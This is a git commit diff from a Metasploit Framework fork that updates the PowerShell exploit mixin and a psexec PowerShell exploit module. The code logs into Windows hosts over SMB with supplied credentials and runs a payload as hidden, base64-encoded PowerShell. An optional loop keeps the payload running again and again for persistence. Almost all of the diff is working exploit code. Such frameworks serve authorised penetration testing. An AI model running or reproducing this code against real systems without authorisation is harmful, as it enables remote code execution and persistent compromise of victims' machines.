Merge branch 'powershell_import' of github.com:sempervictus/metasploit-framework into powershell_import
RageLtMan
commit
2c850d8f8b
|
|
@ -11,7 +11,9 @@ module Exploit::Powershell
|
|||
super
|
||||
register_advanced_options(
|
||||
[
|
||||
OptBool.new('RUN_WOW64', [
|
||||
OptBool.new('PSH::PERSIST', [true, 'Run the payload in a loop', false]),
|
||||
OptBool.new('PSH::OLD_METHOD', [true, 'Use powershell 1.0', false]),
|
||||
OptBool.new('PSH::RUN_WOW64', [
|
||||
false,
|
||||
'Execute powershell in 32bit compatibility mode, payloads need native arch',
|
||||
false
|
||||
|
|
@ -98,7 +100,7 @@ EOS
|
|||
#
|
||||
# Creates cmd script to execute psh payload
|
||||
#
|
||||
def cmd_psh_payload(pay, old_psh=false)
|
||||
def cmd_psh_payload(pay, old_psh=datastore['PSH::OLD_METHOD'], wow64=datastore['PSH::RUN_WOW64'])
|
||||
# Allow powershell 1.0 format
|
||||
if old_psh
|
||||
psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
|
||||
|
|
@ -106,14 +108,14 @@ EOS
|
|||
psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
|
||||
end
|
||||
# Run our payload in a while loop
|
||||
if datastore['PERSIST']
|
||||
if datastore['PSH::PERSIST']
|
||||
fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
|
||||
sleep_time = rand(5)+5
|
||||
psh_payload = "function #{fun_name}{#{psh_payload}};"
|
||||
psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
|
||||
end
|
||||
# Determine appropriate architecture, manual method reduces script size
|
||||
ps_bin = datastore['RUN_WOW64'] ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
|
||||
ps_bin = wow64 ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
|
||||
# Wrap in hidden runtime
|
||||
psh_payload = run_hidden_psh(psh_payload,ps_bin)
|
||||
# Convert to base64 for -encodedcommand execution
|
||||
|
|
|
|||
|
|
@ -1,6 +1,14 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/exploit/powershell'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ManualRanking
|
||||
|
|
@ -8,8 +16,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Exploit mixins should be called first
|
||||
include Msf::Exploit::Remote::SMB::Psexec
|
||||
include Msf::Exploit::Powershell
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -29,7 +35,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
|
||||
'Author' => [
|
||||
'RageLtMan <rageltman[at]sempervictus'
|
||||
'Royce @R3dy__ Davis <rdavis[at]accuvant.com>', # PSExec command module
|
||||
'RageLtMan <rageltman[at]sempervictus' # PSH exploit, libs, encoders
|
||||
],
|
||||
|
||||
'License' => MSF_LICENSE,
|
||||
|
|
@ -48,9 +55,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ],
|
||||
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
|
||||
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jan 01 1999',
|
||||
'References' => [
|
||||
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
|
||||
[ 'OSVDB', '3106'],
|
||||
|
|
@ -61,43 +70,45 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
))
|
||||
|
||||
register_options([
|
||||
OptBool.new('PERSIST', [false, 'Run the payload in a loop']),
|
||||
OptBool.new('PSH_OLD_METHOD', [false, 'Use powershell 1.0', false]),
|
||||
OptBool.new('DryRun',[false,'dry run',false]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
command = cmd_psh_payload(payload.encoded,datastore['PSH_OLD_METHOD'])
|
||||
command = cmd_psh_payload(payload.encoded)
|
||||
if datastore['DryRun']
|
||||
print_good command
|
||||
return
|
||||
end
|
||||
|
||||
#Try and authenticate with given credentials
|
||||
if datastore['PSH::RUN_WOW64'] and target_arch.first == "x86_64"
|
||||
fail_with(Exploit::Failure::BadConfig, "Select an x86 target and payload with RUN_WOW64 enabled")
|
||||
end
|
||||
|
||||
# Try and authenticate with given credentials
|
||||
if connect
|
||||
begin
|
||||
smb_login
|
||||
rescue StandardError => autherror
|
||||
print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}")
|
||||
return
|
||||
fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}")
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
# Execute the powershell command
|
||||
begin
|
||||
print_status("#{peer} - Executing the payload...")
|
||||
#vprint_good(command)
|
||||
begin
|
||||
return psexec(command)
|
||||
rescue StandardError => exec_command_error
|
||||
print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
|
||||
return false
|
||||
end
|
||||
fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def peer
|
||||
return "#{rhost}:#{rport}"
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue